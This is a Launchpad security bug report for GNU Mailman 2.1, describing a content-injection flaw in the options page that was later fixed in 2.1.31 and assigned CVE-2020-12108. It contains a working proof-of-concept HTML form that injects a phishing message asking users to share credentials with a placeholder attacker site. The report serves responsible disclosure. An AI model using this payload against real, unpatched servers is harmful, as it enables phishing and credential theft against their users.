*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/ exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser. Code:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://example.com/mailman/options/mailman" method="POST"> <input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" /> <input type="hidden" name="UserOptions" value="Unsubscribe or edit options" /> <input type="hidden" name="language" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
2. Can be seen there- "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" message will be displayed on the screen.
** Affects: mailman Importance: Medium Assignee: Mark Sapiro (msapiro) Status: Confirmed
** Patch added: "Patch to fix this issue" https://bugs.launchpad.net/mailman/+bug/1873722/+attachment/5356970/+files/o...
** Changed in: mailman Milestone: None => 2.1.31
** Branch linked: lp:mailman/2.1
** Changed in: mailman Status: Confirmed => Fix Released
** Information type changed from Private Security to Public
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12108
-
Launchpad Bug Tracker -
Mark Sapiro
-
Mark Sapiro